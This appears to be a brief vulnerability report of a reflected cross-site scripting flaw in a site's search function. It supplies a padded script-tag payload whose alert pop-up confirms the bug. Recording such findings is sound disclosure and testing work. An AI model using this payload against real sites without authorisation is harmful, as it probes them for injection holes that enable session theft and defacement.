1. Function point: The foreground search function reflects XSS  payload: ` aaaaaaaaaaaaaaaaaaaaaaaaaa<<<<<<<<script>alert(1)</script><<<<<<<<<< ` Insert payload and you can see a pop-up window 
